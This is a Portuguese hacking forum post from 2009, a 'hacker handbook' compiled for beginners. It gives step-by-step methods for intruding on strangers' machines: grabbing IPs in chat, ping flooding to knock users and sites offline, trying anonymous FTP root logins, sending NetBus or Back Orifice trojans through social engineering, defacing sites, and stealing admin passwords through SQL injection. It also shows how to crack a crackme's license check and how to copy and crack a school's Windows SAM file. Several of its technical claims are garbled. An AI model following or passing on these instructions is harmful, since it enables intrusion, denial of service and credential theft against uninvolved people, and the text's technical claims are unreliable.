Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Apostila H4cker Detalhada

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Matéria Apostila H4cker Detalhada

    Apostila H4cker

    Apostila da Galera,uma apostila de todos os membros!
    Área destinada a matérias, artigos, técnicas de prevenção contra vírus, métodos de segurança na web para iniciantes.


    Apostila da Galera,uma apostila de todos os membros!
    por slek3@hotmail.com em 19 Set 2009, 11:35

    Aqui esta uma apostila de hacker que montei seria necessario te-la aqui no GH,
    ela tem pedaços de tudo quanto é lugar,e textos meus,era muita coisa ai eu tive a idéia de juntar tudo em uma única apostila,
    entao,se você viu uma parte de seu topico aqui,crédito á você,a tudo e todos quem me concederam os textos.

    Créditos!

    Adaptaçao e Organizaçao da Apostila:M2G Vida Loka
    E TEXTOS:Uma homenagem a todos os que fazem parte do guiadohacker,pois,todos estão aqui!

    O termo HACKER

    Quem não sabe praticamente nada ou seja aquele que só usa o computador e mal as vezes sabe usar apenas usando o minímo necessario é um Noob

    Quem já usa programa de invasão,
    Nuke para derrubar conexão e outros trajans já prontos ou seja o kra que só usa esses programas sem altera-los é um Lammer

    Hacker, Quem será esse logo que vc não compreende por que essa denominação
    - Hacker é aquele que entende do Sistema Operacional e é capaz de até modificar programas para seus propósitos,
    sabe achar falhas em outros programas e outras formas de invadir,
    ou seja literalmente ele entende de informática não apenas usa programas prontos mesmo que esses programas venham ser exclusivamente de uso Hacker,
    e também foi atribuido ao Hacker do passado esse termo era usado para identificar quem realmente era um Gêneo nesse ramo,
    também invasões em outros computadores, tendo em vista o grande conhecimento necessario para fazer aquilo.
    Como sabemos que vc já um Hacker, não por vc ter conseguido uma grande invasão e sim ter invadido algum computador,
    esse é considerado por nossa categoria Hacker o Diploma que vc é de fato um Hacker,
    eu considero aqueles que conseguiram invadir apenas usando ferramentas simples e não programas,
    pois é necessário um maior conhecimento como de fato tudo isso funciona.
    Espero ter exclarecido algumas coisas, mas por eu ser um Hacker não quer dizer que eu saiba tudo as vezes me perguntão mas e tal programa como usa,
    são tantos que as vezes alguns nem tenho aqui,
    e por ser Hacker não me interesso em usar programinhas de invações tem alguns que tenho aqui mas eles são de toda prova ou seja os melhores ok.

    Mas não quer dizer que vou ensinar tudo nos minimos detalhes.
    Aqui como vc deve fazer, e o que não deve por que se não eles identificão quem é vc e vão para na sua casa rsrsrs

    O que é Cracker?- esse termo nem é atual e também não é mais velhor que o termo Hackers. Oque temos de direrente entre esse e em comum

    O Hacker são atribuidas invasões que não danificam ou seja ele invade copia o que interessa e não deleta nada e tb não deixa rastro

    Ao Cracker atribuimos invasões com interesse de desvio de dinheiro de contas e computadores com vírus que danicam todo o sistema e outros crimes,
    atribudos e ligados a informática

    Iniciante
    Dê inicio, aprender os Comandos de MS-DOS mais utilizados ajudará bastante até mesmo para a criação de Vírus
    O edit do MS-DOS é bastante util para abrir e criar arquivos e programas

    Para quem quer entrar de cabeça

    Comece aprendendo sobre comandos do MS-DOS e criando arquivos em lotes depois aprendendo a mexer nas configurações do windows,
    nunca será um bom Hacker se não souber instalar o Windows e outras coisas mais como mexer em registro do Windows,
    o que são trojan, vírus e como utiliza-los.
    Compartilhamento de arquivos e impressoras, Redes, Protocolos.

    Linguagens de Programação, ASM, C, C++, DELPHI, VB.
    Para montar paginas na net, HTML, JAVA SCRIPT, ASP, PHP...
    Também aprender, Unix, Linux
    Saibá que tudo de novo para se manter atualizado...

    Dai vem a frase nunca sabemos tudo, e um bom Hacker nunca para de aprender.

    É interessante vc Parcionar seu HD e instalar o Windows em uma repartição e o Linux em outra para estar também aprendendo,
    pois cada dia mais que passa parece que a tendência é o Linux tomar conta ou ter uma porcentagem bem maior futuramente

    (O QUE É IP)
    O IP é uma identificação que muda cada vez que vc acessa a Internet,
    sendo assim é muito dificil vc encontrar uma pessoa simplesmente com o número do IP a não ser que seja Fixo,
    mas cada dia isso tem tornado previlégio de empresas de hospedagens e provedores de acesso ou Sites.
    Sendo assim não é possivel achar uma pessoa pelo IP O que é possivel vc conversando via MSN ou ICQ ou Sala de Bate Papo pegar o IP da Pessoa

    Mas tem uma outra opção,
    que é o nome do HOST,
    mas é uma questão que as configurações tem que estar disponivel no PC que vc quer encontrar aí sim indepedente do IP vc achará o
    Computador de quem vc procura com seu respectivo usuário

    Dependo das configurações do Computador dessa pessoa poderá sim encontrar.
    Vamos supor que vc uma vez pega o IP e esse computador tem o nome do Host aí vc anota ele e toda vez que quizer encontrar ao invéz de vc
    digitar o IP vc digita o nome do Host que independente do IP que tiver o encontrará
    Mas para isso o computador deve estar configurado diferente o computador de quem vc quer encontrar ok,
    sendo assim é uma opção dificil ok, mas se estiver configurado vc achará facilmente!!!

    Pegando IP 100% DE PRECISÃO
    Se vc tiver em uma sala de bate-papo para pegar o IP dessa pessoa,
    vc precisa conversa no Reservado o melhor não é programa e sim
    comandos de D.O.S no Prompt do MS-D.O.S. e dependendo de seu Windows comandos tipo arp -a ou netstat -n ou outro sub comando. É preciso de certa prática.

    Mas depende por onde tb vc quer pegar o IP, via MSN tem que enviar e receber um arquivo,
    o arquivo não precisa ser .exe pode ser uma foto mesmo, ou um texto e também conversa com Audio ou mesmo Web Cam
    Por ICQ o envio ou recebimento de arquivos também.

    1º) Feche todas as janelas do Internet Explorer e aguarde 5 minutos para limpar o Buffer de conexões.

    2º) Abra o Prompt do MS-DOS

    3º) Se for Messenger ou ICQ facilita apenas teclar com a pessoa que vc quer

    4º) Digite arp -a<ENTER> se for Windows XP
    netstat -n<ENTER>

    5º) Veja os IPs que apareceram

    6º) Agora envie ou receba o arquivo, não importa qual seja bom se for maior que 30kb ou conversa de Audio ou Web-Cam

    7º) Começou a receber o arquivo ou enviando vá no
    Prompt do MS-DOS e digite o comando arp -a<ENTER> ou netstat -n<ENTER> o IP que aparecer diferente do comando anterior é o que vc procura


    Obs: Cabe vc observar que qdo pegamos o IP de quem tem Speed poderá aparecer dois novos IPs
    aí um de fato é o PC de quem vc esta enviando ou recebendo um arquivos,
    mas o outro não então se vc precisa indentificar entre os dois qual realmente é o do PC

    De qual Lugar é o IP?
    Bom a primeira sequência do IP temos pais
    200.???.???.??? e 201.???.???.??? Brasil e também determina uma certa faixa o Provedor

    Na segunda Sequência
    ???.159.???.??? Como exemplo determina a cidade,
    só que um porém de vez enquando costuma-se mudar esse numero de cidade sendo assim
    tornado um pouco mais dificil saber qual é mas se vc tiver alguém que tenha a mesmo numero nessa sequência pegunte a cidade pois será a mesma ok.

    Depois de vc pegar o IP
    O que fazer para Invadir

    Primeiro precisamos achar uma porta aberta. Como fazer isso?

    Vc pode usar desde um simples programa tipo R3x que escaneia varios computadores na net e vê quais portas estão abertas,
    esse programa vc encontra disponivel Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... vá na secção de DOWNLOAD e procure por ele

    Ou vc tentar manualmente achar portas abertas que é as vezes até mais eficiente,
    vamos assim dizer que o R3x faz rapidamente podendo escapar alguma porta, de forma manual isso não ocorrerá

    Isso dá trabalho? é claro que sim. Demorá? Sim demora

    Bom aí vc tentar utilizar as formas mais simples de invasão primeiro coloca o IP no Browser

    Depois FTP

    Depois TelNet

    Depois Redes Microsoft


    Depois: Tem outras formar tentar invadir pelo Bugs do Sistema se o Internet explorer for igual ou inferior ao 5.5:
    Back Orifice e outros...

    Hiiii nenhum... o que fazer. Oras arrombe a porta, Caraca vc deve esta pensando que mer... como fazer isso???

    Se vc pegou o IP por que esta conversando com o Noob ou Lammer metido a Hacker melhor ainda,
    Engenharia Social nele... aí nessa hora entra o tchan-tchan-tchannn... Trojannn
    >>>>Engenharia-social:

    Você com certeza já deve ter ouvido falar em engenharia-social na sua vida ou ate tenha feito uso da mesma.
    Engenharia-social se trata da habilidade de manipulação das pessoas através da comunicação, ou seja, você vai poder obter
    dados e coisas interessantes simplesmente "pedindo" para os alvos ingenuos.
    Para você ter uma noçao sobre isso nada melhor do que a prática e a leitura da Zine do Virii Hacking, onde ha um
    ótimo texto sobre Engenharia-social feito pelo grande e saudável Inferninho. Ela pode ser encontrada em:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    br.groups.yahoo.com/group/virii_hacking/


    Tem varios, procure saber se o Kra tem anti-vírus se não tiver mande de kra o mais popular dos populares Trojans Net-Burros haaaa descupe
    kkk é o Net-Bus bom mas bem sujestivo não o nome inclusive vem bem a calhar rsrsrs

    Tem outros Trojans melhores são muitos,
    mas cuidado com aqueles que fazem mão dupla vc usa ele para invadir e ele abre as portas para alguém tb te invadir e cuidado com alguns
    FireWall que andam circulando pela internet com nomes estranhos tem alguns que abrem a porta é propósital que isso foi feito
    então não instale nada com nome estranho

    Derrubando Conexão
    Tem comando no MS-DOS para derrubar ou melhor dizendo deichar os PCs tão cheios de pacotes de Protocolos que eles desconectam.
    O comando é o ping, exemplos:

    c\windows>ping -t IP
    ou
    c\windows>ping -f IP

    PING varios PACOTES

    c\windows>ping -t-<n> -f- IP

    Exemplos:

    c\windows>ping -t-11000 -f- IP
    ou
    c\windows>ping -f-11000 -t- IP

    Bom, como podem ver precisa do IP e uma conexão mais rápica de quem vc quer atacar e pode ser feito por varios amigos em
    outros PCs(chamado ataque em massa) para tirar até sites do AR,
    ao mesmo tempo vc pode abrir até 6(seis) janelas do DOS com ping -t-<n> -f- IP e ping -f-<n> -t- IP.

    O que é PACOTE?
    Pacotes são conjuntos de Dados enviados atravéz de um Protocolo no caso TCP/IP

    Imagine um pacote que solita 11.000 pacotes de resposta tipo um comando mas restrito a interpretação do Processador

    Mas um Pacote também é um conjundo de dados também podendo por exemplo: conter dados de uma foto,
    vc já deve ter visto uma foto montando em sua tela parte por parte, dependendo da velocidade da conexão.

    Assim podemos dizer que um Pacote é um conjunto de dados respeitando as regras de acordo com cada protocolo de tramissão como fosse um Byte,
    que é composto de 8 Bits, só que para a transmissão via internet ou outro meio é necessaria seguir determinadas regras previamente
    estabelecidas de acordo com cada Protocolo no caso da Internet é o TCP/ IP que composto de 32 Bits,
    mas em sistemas mais antigos talvéz vc tenha visto outros

    O Pacote seria um conjunto de dados que ao ser montado corresponderia a varios Bytes compondo um comando ou parte de um arquivo,
    sendo que cada Pacote pode conter dados essencial na montagem do próximo Pacote.

    Inclusive os FareWall são baseados na interpretação de cada Pacote checando se seu conteúdo não contém algo nocivo ao seu computador,
    principalmente qdo vc configura seu Firewall para estar mostrando qualquer tipo de invasão ou mesmo Ping vc notará que ele
    está analisando os dados que vem via net(rede) ou internet (pacote por pacote é analisado)

    Um pacote pode conter um pedido para acessar sua porta 80 ou mesmo Ping para ele gerar outros pacotes para medir simplesmente o tempo de resposta,
    e se forem muitos ele não conseguirá processar a tempo imagine isso RSRSRSR e outras coisas mas...

    TelNet
    É um programa usado para comunicação entre dois computadores ligados em um net(rede) ou internet(inter=internacional)

    Desta forma, podendo enviar arquivos e também cópiar e podendo até fazer modificações no sistema desse outro Computador
    Imagine vc trabalha em uma empresa e vc está na Matriz e tem 10(dez) Filiais todas com acesso a internet,
    desde vc ter que ir em cada uma delas para recolher as listas de pedidos vc simplesmente acessa usando o Telnet pengando os
    dados necessário e só indo lá para entregar,
    isso tb pode ser feito, via FTP, via Redes Microsoft, Via VNC e entre outros.
    E além de vc mesmo fazer manutenção nesses Computadores a distância,
    pois essa idéia surgiu inicialmente bem no inicio da internet qdo o nome usado era BBS e havia um número de
    Técnicos muito pequeno imagine ele ter que se deslocar para um outro estado para corrigir um simples arquivo de comando
    e assim sendo feito a distância, nessa também começa o aparecimento dos Hackers

    Bom que eu saiba o Tel-net em um programa que vem com o Windows 95, 98, 98SE, Millenium, 2000, no XP parece que ví um
    Tel-net que mais parecia ftp que vc teria que usar sem janela algo no MS-DOS.

    O programa Telnet é para acessar remotamente outro Computador sem grandes segredos inclusive uso pouco ele até hoje só tive
    uma invasão bem sucedida usando ele e algumas outras tentativas mas sem grande penetração, vamos lá:

    TelNet _ Vá em iníciar depois executar e digite Telnet e click <OK>
    Quando abrir Click em CONECTAR
    Depois click em SISTEMA REMOTO e coloque o IP em NOME DO HOST ou o próprio nome se vc souber do que se trata
    Especifique a Porta do serviço por onde vc queira entrar
    Especifique Tipo de Terminal
    E Click em CONECTAR
    Caso Haja Conecção aparecerá
    Longin:
    Senha:

    Caso Não
    Aperecerá a seguinte messangem:
    Conexão ao Host Perdida

    Também poderá indicar que o serviço do servidor ou PC está com outra configuração,
    aí tente outro TIPO DE TERMO e outra PORTA, se nenhuma com sucesso indica que o IP do servidor ou PC não tem esse Server

    Más se vc descobrir o Login e a Senha
    Para vc usa-lo é necessário saber comandos de MS-D.O.S.

    INVASÃO VIA BROWSER
    O próprio Internet explorer ( digitando o IP onde tem o endereço )

    INVASÃO POR FTP E TAMBÉM CONHECIDA INVASÃO D.O.S
    VAI ALGUMAS DICAS SIMPLES QUE VC ENCONTRARÁ EM SEU PRÓPRIO WINDOWS PARA HACKEAR OU MELHOR INVADIR

    1º) FTP ( no próprio MS-DOS vá no prompt do MS-DOS e digite FTP depois digite OPEN e coloque o IP do MALA 100 ALÇA,
    para sair digite QUIT e claro sempre ENTER, não vá si-perder não mexa se não souber comando de DOS)

    PRIMEIRO O HOST OU IP QUE VC QUER INVADIR TEM QUE TER O SERVER FTP CASO CONTRARIO NADA FEITO,
    VC TERÁ QUE ENCONTRAR UM OUTRO SERVIÇO QUE ESSE IP TENHA PARA ACESSO A DISTÂNCIA, COMO SABE TEM VARIOS

    BOM FTP PARA INICIANTES:

    ENTRE NO PROMPT DO MS-DOS
    DIGITE: FTP <ENTER>
    DIGITE: OPEN<ENTER>
    VAI APARECER
    PARA
    DIGITE O IP OU NOME DO HOST <ENTER>

    SE DEPOIS DE ALGUM TEMPO APENAS APARECER "> ftp: connect :10060" OU MESMO OUTRO NÚMERO NO FINAL, O HOST NÃO TEM ESSE SERVER FTP

    MAS SE ELE TIVER VAI APARACER
    LONGIN:
    SENHA:

    SE VC SOUBER O LONGIN E A SENHA OU TENTE DESCOBRIR
    CASO CONTRARIO FASSA O SEGUINTE:

    LONGIN: SEM DIGITAR NADA <ENTER>
    SENHA: SEM DIGITAR NADA <ENTER>

    ATENÇÃO: AGORA ENTRAR INVISIVEL PODE-SE CONSEGUIR,
    COM RESTRIÇÕES DE ACESSO MAS SE O SERVER FOR ATUALIZADO OU DEPENDENDO DE SUA CONFIGURAÇÃO NEM ISSO ACEITARÁ!

    PARA ENTRAR ANÔNIMO OS SEGUINTES COMANDOS:

    quote user ftp <ENTER>
    quote cwd~root <ENTER>
    quote pass ftp <ENTER>

    Obs: A cada comando digitado surgira respostas de não aceitação,
    após terminar a sequuência para saber se vc entrou digite DIR<ENTER> se não aparecer uma lista com diretórios(pastas)
    é porque não tem acesso, está protegido.

    Se aparecer: user restriction aplly, vc não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com outro user tipo:

    quote cwd~sys<ENTER>
    ou
    quote cwd \line ~sys<ENTER>

    e os outros da lista UNIX....

    INVASÃO ATRAVÉS DE REDES MICROSOFT
    Se seu computador tiver Redes microsoft e trabalhando como servidor
    ( vá em INÍCIAR depois em LOCALIZAR e ira ter COMPUTADORES só terá essa opção se seu PC estiver configurado para Redes Microsoft,
    lá em localizar digite o IP do Hacker que diz que sabe tudo e não Posta aqui $%#&"/ NENHUMA QUE FUNCIONE A NÃO SER PARA INVADIR SEU PC)


    Vá no PAINEL DE CONTROLE e depois click no Ícone do SISTEMA e procure e passa seu windows para servidor de REDE o Windows
    irá pedir o CD-Rom de instalação do Windows!
    Agora vá no PAINEL DE CONTROLE
    Lá vc procura e clica em REDE
    Depois de abrir, vá na aleta CONFIGURAÇÃO apesar que geralmente abra se nela.
    Click agora em adicionar vai aparecer algumas opções e escolha CLIENTE
    Vai aparecer outras opções click em MICROSOFT
    Ao lado click e selecione CLIENTE PARA REDES MICROSOFT e click OK e OK novamente o Windows irá pedir para reinicia além do CD-Rom de Instalação.

    Mas não se esqueça com essas configurações seu computador ficará mais vuleravel a ataques e invasões.

    OBS: NENHUMA DESSA ALTERNATIVAS FUNCIONARAM SE OS COMPUTADORES QUE VCs FOREM INVADIR NÃO TIVER CONFIGURAÇÕES COMPATIVEIS COMO
    TB DOMINIO E GRUPO DE TRABALHO SE NÃO SOUBEREM O QUE É ISSO NEM ADIANTA TENTAR E SE VC ESTIVER EM UMA REDE TAMBÉM NÃO FUNCIONARÁ
    A NÃO SER NO SERVIDOR OU EM UM PC DIRETO COM SPEED OU CONECÇÃO DISCADA TB FUNCIONA

    SAIBÁ QUE! INVADIR SE FOR PEGO É CRIME SENDO ASSIM NÃO ME RESPONSABILIZO PELAS VOSSAS AÇÕES ISSO É PARA CARATER DIDÁTICO, MAS AVISO FUNCIONA!!!

    Problemas na Hora de Invadir
    E sim vamos supor que o PC dele seja um Atlon 2000 e ele tenha um HD de 80 Gb
    E vc estaja com um PC Celeron 1.7 com HD de 30Gb aí entra a questão seu PC não tem capacidade de invasão aí ele trava,
    pois como vai suportar tanta quantidade de dados para reconhecer, tanto precisa de memoria e maior capacitade no geral
    Já aconteceu comigo isso Hj tenho um PC bem melhor rsrsrsrs
    A questão de invadir pelo D.O.S como no FTP a pessoa precisa ter o serve do FTP caso contrario nada feito,
    pois invadir por REDES MICROSOFT é um tipo de invasão FTP é outro Telnet outro BackOrifice outro e por aí vai...


    Tonny Invadindo Por Bug 22/06/2005 01:08
    Sim tem um jeito
    Vamos supor que o computador que vc queira acessar o compartimento
    cHD) esteja com o Windows mesmo sendo original mas com Internet explorer 5.5 como ele vem no original ou até mesmo inferior
    Devido um BUG(falha) vc poderá usar um BackOrifice ou mesmo um 666 para ter acesso.
    Mas se o PC estiver com Internet Explorer atualizado, sem chance...

    Qual Porta Entrar?
    Depois cheque qual porta está acessivel
    com um Scan-port que podera ser R3x ou o Vanguard(este é melhor e também mais complexo em usar)

    A questão depedendo de qual porta em questão está acessivel, conforme for
    por exemplo

    porta 80 HTTP(BROWSER Internet Explorer)
    porta 21 FTP (Programa FTP do MS-D.O.S.)
    Porta 23 Telnet
    e outras mais

    Tem programas que vc poderá selecionar a porta que vc quer invadir tem diversos.
    Por ultima opção será vc enviar um trojan se não conseguir acessar nenhuma e desta forma abrindo uma conforme o Trojan enviado

    Saiba que o modem de qualquer tipo tem cerca de 65500 Portas
    Sendo que as portas de 1 à 10 são utilizadas para controle e sincronismo de comunicação de dados por exemplos comando RX e TX e sinal de sincronismo
    A perda desses sinais levam a perda de conexão

    Invadindo UM SITE
    Basta vc invadir a hospedagem do Site e colocar lá eu HTML ou SCRIP para PIXAR

    Um opção para achar o IP do site e e em qual servidor de hospedagem que está, vc faz o seguinte no Prompt do MS-D.O.S

    Digita o seguinte comando com o nome do site

    C:\WINDOWS>ping Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... <ENTER>

    Após ter feito isso aparecerá um IP que vc poderá colacar ele no próprio Browser(Internet Explorer, Netsckpe e outros),
    no lugar do endereço vc digita diretamente o IP que apareceu aí vc achará quem está hospedando o Site!
    Ai e só brincar.

    Ou também voce poderá usar um SQL Injection pra,fazer com que o banco de bados te envie de volta a senha do Administrador do site


    SQL Injection

    O que é SQL

    O que é e para que serve o SQL

    As aplicações em rede são cada dia mais numerosas e versáteis. Em muitos casos,
    o esquema básico de operação é uma série de scripts que dirigem o comportamento de uma base de dados.

    Devido à diversidade de linguagens e de base de dados existentes,
    a maneira de comunicar entre umas e outras seria realmente complicado de providenciar,
    a não ser pela existência de padrões que nos permite realizar as operações básicas de una forma universal.

    É justamente disso que se trata o Structured Query Language que não é mais do que uma linguagem padrão de comunicação com base de dados.
    Falamos portanto, de uma linguagem normalizada que nos permite trabalhar com qualquer tipo de linguagem
    (ASP ou PHP) em combinação com qualquer tipo de base de dados (MS Access, SQL Server, MySQL...).

    O fato de ser padrão não quer dizer que seja idêntico para cada base de dados. Na prática,
    determinadas bases de dados implementam funções específicas que não têm necessariamente que funcionar em outras.

    À parte desta universalidade, o SQL possui outras duas características muito apreciadas.
    Por uma parte, apresenta potência e versatilidade notáveis que contrasta,
    por outra, com sua acessibilidade de aprendizagem.

    Tipos de campos

    Diferentes tipos de campos empregados nos bancos de dados.

    Como sabemos, um banco de dados é composto por tabelas onde armazenamos registros catalogados em função de diferentes campos (características).

    Um aspecto prévio a considerar é a natureza dos valores que introduzimos nesses campos.
    Visto que um banco de dados trabalha com todo o tipo de informações,
    é importante especificar que tipo de valor estamos introduzindo de maneira a,
    por um lado, facilitar a busca posteriormente e por outro, otimizar os recursos de memória.

    Cada banco de dados introduz tipos de valores de campo que não necessariamente estão presentes em outros.
    Entretanto, existe um conjunto de tipos que estão representados na totalidade destes bancos. Estes tipos comuns são os seguintes:

    Alfanuméricos-Contém cifras e letras. Apresentam uma longitude limitada (255 caracteres)

    Numéricos-Existem de vários tipos, principalmente, inteiros (sem decimais) e reais (com decimais).

    Booleanos-Possuem duas formas: Verdadeiro e falso (Sim ou Não)

    Datas-Armazenam datas facilitando posteriormente sua exploração.
    Armazenar datas desta forma possibilita ordenar os registros por datas ou calcular os dias entre uma data e outra...

    Memos-São campos alfanuméricos de longitude ilimitada.
    Apresentam o inconveniente de não poder ser indexados (veremos mais adiante o que isto quer dizer).

    Auto-incrementáveis-São campos numéricos inteiros que incrementam em uma unidade seu valor para cada registro incorporado.
    Sua utilidade é mais que evidente: Servir de identificador já que são exclusivos de um registro.

    Adicionar um novo registro


    Sintaxe e exemplos para introduzir registros em uma tabela.

    Os registros podem ser introduzidos a partir de sentenças que empregam a instrução Insert.

    A sintaxe utilizada é a seguinte:

    Insert Into nome_tabela (nome_campo1, nome_campo2,...) Values (valor_campo1, valor_campo2...)

    Um exemplo simples a partir da nossa tabela modelo é a introdução de um novo cliente que seria feito com uma instrução deste tipo:

    Insert Into clientes (nome, sobrenomes, endereço, cidade, código postal, e-mail, pedidos)
    Values ('Pedro', 'Palotes', 'Percebe n°13', 'Londrina', '123456', 'pedro@criarweb.com', 33)

    Como se pode ver, os campos não numéricos ou
    booleanos vão delimitados por apóstrofes: '. Também é interessante ver que o código postal foi salvo como um campo não numérico.
    Isto é devido a que em determinados países (Inglaterra,por exemplo) os códigos postais contém também letras.

    Nota: Se desejarmos praticar com um banco de dados que está vazio,
    primeiro devemos criar as tabelas que vamos preencher. As tabelas também se criam com sentenças SQL e aprendemos a fazer isso no último capítulo.

    Embora, de qualquer forma, pode ser que seja mais cômodo utilizar um programa com interface gráfica, como Access,
    que pode nos servir para criar as tabelas em banco de dados do próprio Access ou por ODBC a outros bancos de dados como SQL Server ou MySQL,
    por dar dois exemplos.

    Outra possibilidade em um banco de dados como MySQL, seria criar as tabelas utilizando um software como PhpMyAdmin.

    Obviamente, não é imprescindível preencher todos os campos do registro. Porém, poder ser que determinados campos sejam necessários.
    Estes campos necessários podem ser definidos quando construirmos nossa tabela mediante o banco de dados.

    Nota: Se não inserirmos um dos campos no banco de dados se iniciará com o valor padrão que tivermos definido na hora de criar a tabela.
    Se não houver um valor padrão, provavelmente se inicie como NULL (vazio), no caso de que este campo permita valores nulos.
    Se esse campo não permitir valores nulos (isso se define também ao criar a tabela) o mais seguro é que a execução da sentença SQL nos dê um erro.

    É muito interessante, já veremos mais adiante o porquê, o introduzir durante a criação de nossa tabela um campo auto-incrementável
    que nos permita atribuir um único número a cada um dos registros. Deste modo, nossa tabela clientes apresentaría para cada registro
    um número exclusivo do cliente que será muito útil quando consultarmos várias tabelas simultaneamente.

    Atualizar um registro

    Sintaxe e exemplos para editar registros em uma tabela.

    Update é a instrução que nos serve para modificar nossos registros. Como para o caso de Delete,
    necessitamos especificar por meio de Where quais são os registros que queremos fazer efetivas nossas modificações.
    Ademais, obviamente, teremos que especificar quais são os novos valores dos campos que desejamos atualizar. A sintaxe é deste tipo:

    Update nome_tabela Set nome_campo1 = valor_campo1, nome_campo2 = valor_campo2,... Where condicoes_de_selecao

    Um exemplo aplicado:

    Update clientes Set nome='José' Where nome='Pedro'

    Mediante esta sentença mudamos o nome Pedro por José em todos os registros cujo nome seja Pedro.

    Aqui também há que ser cuidadoso de não esquecer de usar Where, do contrário, modificaríamos todos os registros de nossa tabela.


    Crackeie seus programas via Assembly!

    Programas que você devera usar
    - Win32Dasm (dissassembler)
    - HexEdit (editor hexadecimal aceita comandos asm).
    - crack-me.exe (programa que vai ser quebrado, feito por eu! =D)

    Bom... Vamos...
    1. execute o crack-me.exe para vermos como ele se executa na memória do nosso computador, repare nas letras que aparecem no programa...
    2. com o programa aberto (crack-me.exe) execute o win32dasm. Com ele aberto (win32dasm) vá ao menu "DEBUG" -> "Atach to an active process"
    3. na janela que aparecera selecione o processo crack-me.exe, "como ele esta na memória do computador?.
    - acabando o processo de "desmontagem" do programa você pode fechar o crack-me.exe
    5. agora vamos procurar pelas letras que apareceram no programa, para tentar localizar a parte do código que checa se existe a tal chave no registro.
    - clique em "Refs" -> "String data references"...

    5.1
    Nessa janela é exibida toda a palavra, ou seja, todos os bytes que vem de 20h a 124h formado ou não por segmentos.
    Vamos procurar pelas palavras que apareceram no programa, comece pelo obvio. Veja o fluxograma

    ----------------------------------------------------------------------------------
    1. inicia processo...
    2. verifica o registro
    3. se existir a chave "teste" na key hkey_local_machine (a)
    4. se não existir a chave "teste" (b)


    A. mostra uma mensagem dizendo que foi crackeado...
    B. mostra uma outra mensagem, dizendo que não foi crackeado.
    ----------------------------------------------------------------------------------

    Execute o programa para ver as mensagens...

    5.2 localize a mensagem "Boa... você crackeou-me! adasuduhasdhu?.
    Clique duas vezes nessa palavra, que você será levado a parte do código onde ela e descrita.
    logo acima a gente pode ver as cedentes informações

    :00412868 teste al, al
    :0041286A jne 00412887
    :0041286C mov eax, dword ptr [...]...

    Essa parte do código e responsavel em analisar se o programa e registrado ou não.
    Vá na parte inferior, o toolbar, e procure onde esta escrito o offset do código, no caso procure por
    @Offset 00011C6Ah, esse e o offset do código do programa que verifica se esta registrado. uma variante no caso.
    Lembre-se dela.

    6. execute o Hiew.Exe o hexedit. Selecione o arquivo crack-me.exe, (coloque o crack-me.exe na pasta do hiew).
    Pressione F4 e selecione HEX, agora pressione F5 e digite o offset do código, no caso, 00011C6A...
    Para alterar dessa forma, você precisa ter uma tabela dos jumpers, e ser um HACKER de verdade =X... Mas vamos dar um jeito!
    Pressione F4 duas vezes, agora você Vera tudo de outra forma, agora e o código asm. Pressione F3 para editar o código,
    Pressione F2 para editar em código asm que fica muito mais fácil.

    6.1
    Agora substitua o jne XXXXXXXX por jmp xxxxxxxx, so troque as três primeiras letras, o resto pode deixar igual, agora salve.
    Pressionando F9, e pressione F10 para sair.

    7. bom, execute o programa crackeado, se der erro, comece tudo de novo. Eu não dei muito exemplo sobre as funções, mas no endereço você.
    Pode obter todas as flags para processadores 80x86 (32bits).

    Intel asm -> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Crack-me -> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Hiew edit -> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    win32dasm:
    Parte 1, 300kb -> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... .part1.rar
    Parte 2, 40 kb -> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... .part2.rar

    Para aprender mais, tenho alguns tutos, leia em:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... ssarra.zip
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


    Para Estudantes!Tenha passe de Administrador na sua escola!

    bem simples titio
    aperta tecla do windows + e
    insira um diskete
    onde tem diskete.. clique com o botão em formatar
    escolha: criar disco de boot
    de ok
    confirme
    ponha o disquete dentro do pc
    reinicie
    na tela que aparecer.. de um:
    COPY C:\WINDOWS\System32\Config\SAM A:\
    tire o disquete
    reinicie o pc
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    baixe e instale cain
    use ele pra desencriptar o arquivo sam que está dentro do seu disquete

    Aqui Phreaking!


    ENTENDENDO O PHREAKING E AS BOXES

    Muitas pessoas ja devem ter ouvido algum dia falar de Phreaking, ou Boxes,
    e ficaram meio na duvida a respeito do que realmente se referem estes termos e se aqueles
    textos sobre o sistema telefonico americano funcionam aqui no Brasil. Para comecar nosso artigo, vamos definir com clareza algumas das palavras:

    phreak - ato ou acao de violar o sistema telefonico,
    com o proposito de con- seguir vantagens ou comodidades adicionais. Na maioria das vezes e' um ato ilegal, mas nem sempre.

    box - qualquer dispositivo usado, ou esquema de ligacao, que permita obter vantagem ou comodidade dos sistemas telefonicos.

    boxing - ato de usar boxes.

    phreaking - o ato de violacao do sistema telefonico como um todo.

    Algumas pessoas podem ate' se espantar com a afirmacao de que `as vezes o phreaking pode nao ser ilegal.
    Esta afirmacao e' valida pois existem certas boxes que permitem algumas comodidades que nao sao consideradas infracoes.
    Por exemplo, existe uma box que faz com que fique tocando musica na linha quando voce aperta um botao, ou uma que permite um gerenciamento visual das linhas telefonicas de sua residencia.
    Elas sao respectivamente a Rock e a Switch Box. Provalvelmente, a mais famosa de todas as boxes e' a blue box.
